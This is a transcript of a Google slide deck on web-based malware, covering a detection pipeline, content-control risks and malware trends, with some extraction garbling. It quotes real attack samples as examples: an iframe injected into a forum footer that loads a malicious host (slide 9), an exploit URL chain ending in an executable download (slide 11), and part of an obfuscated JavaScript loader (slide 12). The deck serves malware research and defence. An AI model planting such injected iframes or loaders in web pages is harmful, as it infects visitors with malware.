the ghost in the browser - semantic scholar€¦ · the ghost in the browser google inc...
TRANSCRIPT
![Page 1: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/1.jpg)
The Ghost In The BrowserAnalysis of Web-based Malware
Niels ProvosDean McNamee
Panayiotis MavrommatisKe Wang
Nagendra Modadugu
Google Inc
![Page 2: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/2.jpg)
Google IncThe Ghost In The Browser
Overview
• Introduction
• Detecting Malicious Pages
• Content Control
• Malware Trends
• Conclusion
2
![Page 3: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/3.jpg)
Google IncThe Ghost In The Browser
Introduction
• Internet essential for everyday life: ecommerce, etc.
• Malware used to steal bank accounts or credit cards
• underground economy is very profitable
• Internet threats are changing:
• remote exploitation and firewalls are yesterday
• Browser is a complex computation environment
• Adversaries exploit browser to install malware
3
![Page 4: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/4.jpg)
Google IncThe Ghost In The Browser
Introduction
• To compromise your browser, we need to compromise your web server
• Very easy to set up new site on the Internet
• Very difficult to keep new site secure
• insecure infrastructure: Php, MySql, Apache
• insecure web applications: phpBB2, Invision, etc.
4
![Page 5: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/5.jpg)
Google IncThe Ghost In The Browser
Detecting Malicious Websites
• Malicious website automatically installs malware on visitor’s computer
• usually via exploits in the browser or other software on the client (without user consent)
• Using Google’s infrastructure to analyze several billion URLs.
5
![Page 6: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/6.jpg)
Google IncThe Ghost In The Browser
Detecting Malicious Websites
6
Web PageRepository
MapReduceHeuristical URL Extraction
Virtual Machine
Internet Explorer
MonitorExecution Analysis
URL
Result
Malicious PageRepository
![Page 7: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/7.jpg)
Google IncThe Ghost In The Browser
Processing Rate• The VM gets about 300,000 suspicious URLs daily
• About 10,000 to 30,000 are malicious
7
11-01 11-21 12-11 12-31 01-20 02-09 03-01 03-21Time
100
101
102
103
104
105
106
Num
ber o
f URL
s
MaliciousInconclusiveHarmless
![Page 8: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/8.jpg)
Google IncThe Ghost In The Browser
Content Control
• what constitutes the content of a web page?
• authored content
• user-contributed content
• advertising
• third-party widgets
• ceding control to 3rd party could be a security risk
8
![Page 9: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/9.jpg)
Google IncThe Ghost In The Browser
Web Server Security
• compromise web server and change content directly
• many vulnerabilities in web applications, apache itself, stolen passwords
• templating system
9
<!-- Copyright Information --><div align='center' class='copyright'>Powered by<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final © 2003 <a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div><iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
![Page 10: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/10.jpg)
Google IncThe Ghost In The Browser
Advertising• by definition means ceding control of content to
another party
• web masters have to trust advertisers
• sub-syndication allows delegation of advertising space
• trust is not transitive
10
Russia
USAPopular Web Site
advertisementAds
CompanyJavascript
Ads
Company
Javascript
Ads
CompanyJavascript
Ads
Company
Javascript
Exploit
Server
HTTP
Redirect
![Page 11: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/11.jpg)
Google IncThe Ghost In The Browser
Third-Party Widgets
• to make sites prettier or more useful:
• calendaring or stats counter
• search for praying mantis
• linked to free stats counter in 2002 via Javascript
• Javascript started to compromise users in 2006
11
http://expl.info/cgi-bin/ie0606.cgi?homepagehttp://expl.info/demo.phphttp://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1http://expl.info/ms0311.jarhttp://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11http://dist.info/f94mslrfum67dh/winus.exe
![Page 12: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/12.jpg)
Google IncThe Ghost In The Browser
Malware Trends and Statistics
• Avoiding detection
• obfuscating the exploit code itself
• distributing binaries across different domains
• continuously re-packing the binaries
12
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D...3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
![Page 13: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/13.jpg)
Google IncThe Ghost In The Browser
Malware Classifications
13
01-11
01-14
01-17
01-20
01-23
01-26
01-29
02-01
02-04
02-07
02-10
02-13
02-16
02-19
02-22
02-25
02-28
03-03
03-06
03-09
03-12
03-15
03-18
03-21
Date
1
10
100
1000
10000
100000
Uniq
ue U
RLs
disc
over
ed
AdwareUnknownTrojan
![Page 14: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/14.jpg)
Google IncThe Ghost In The Browser
Remotely Linked Exploits• Exploits are leveraged across many sites
• Popular exploits are linked from over 10,000 URLS
14
0 20 40 60 80 100 120 140 160 180 2001
10
100
1000
10000
Num
ber o
f URL
s
0 20 40 60 80 100 120 140 160 180 2001
10
100
1000
10000
Num
ber o
f hos
ts
![Page 15: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/15.jpg)
Google IncThe Ghost In The Browser
Discussion
• increase of web-based exploitation over time
• installed malware allows for remote control
• observed botnet like structures:
• pull-based: frequently checking for new commands
• observed user agents such as: DDoSBotLoader
• binary updates can be interpreted as command & control
15
![Page 16: The Ghost In The Browser - Semantic Scholar€¦ · The Ghost In The Browser Google Inc Introduction • To compromise your browser, we need to compromise your web server • Very](https://reader036.vdocuments.net/reader036/viewer/2022070807/5f0640ff7e708231d417116f/html5/thumbnails/16.jpg)
Google IncThe Ghost In The Browser
Conclusion
• Web-based malware is a real problem
• millions of potentially infected users
• Automatic detection of malicious web pages to secure web search results
• Identified four areas of content control
• Observed botnet-like structures
16